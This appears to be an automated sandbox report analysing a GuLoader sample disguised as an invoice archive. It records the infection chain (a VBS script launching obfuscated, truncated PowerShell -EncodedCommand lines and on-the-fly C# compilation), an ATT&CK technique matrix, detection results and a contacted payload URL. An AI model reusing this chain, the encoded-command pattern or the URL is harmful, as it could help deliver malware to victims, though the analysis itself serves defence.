    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDB
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES571F.tmp" "c:\Users\user\AppData\Local\Temp\xd0x2kfy\CSC444B4F613D554F189420B3812D9BACB.TMP"
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\unarchiver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter    		Path Interception11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts211
    Scripting    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Disable or Modify Tools    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Application Layer Protocol    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell    		Logon Script (Windows)Logon Script (Windows)21
    Virtualization/Sandbox Evasion    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Process Injection    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common211
    Scripting    		Cached Domain Credentials13
    System Information Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
    Obfuscated Files or Information    		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 623395 Sample: WWVN_INVOICE_8363567453.lzh Startdate: 10/05/2022 Architecture: WINDOWS Score: 84 44 Found malware configuration 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected GuLoader 2->48 50 C2 URLs / IPs found in malware configuration 2->50 10 unarchiver.exe 5 2->10         started        process3 process4 12 cmd.exe 2 2 10->12         started        14 7za.exe 2 10->14         started        signatures5 17 wscript.exe 2 12->17         started        20 conhost.exe 12->20         started        52 Potential malicious VBS script found (has network functionality) 14->52 22 conhost.exe 14->22         started        process6 signatures7 38 Wscript starts Powershell (via cmd or directly) 17->38 40 Very long command line found 17->40 42 Encrypted powershell cmdline option found 17->42 24 powershell.exe 20 17->24         started        process8 dnsIp9 36 192.168.2.1 unknown unknown 24->36 27 csc.exe 3 24->27         started        30 conhost.exe 24->30         started        process10 file11 34 C:\Users\user\AppData\Local\...\xd0x2kfy.dll, PE32 27->34 dropped 32 cvtres.exe 1 27->32         started        process12

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    WWVN_INVOICE_8363567453.lzh26%VirustotalBrowse
    WWVN_INVOICE_8363567453.lzh5%ReversingLabsScript.Downloader.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://go.micro0%URL Reputationsafe
    http://barsam.com.au/bin_FCWtLoO90.bin0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://barsam.com.au/bin_FCWtLoO90.bintrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000016.00000002.516470478.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://go.micropowershell.exe, 00000016.00000002.517426585.000000000512F000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown

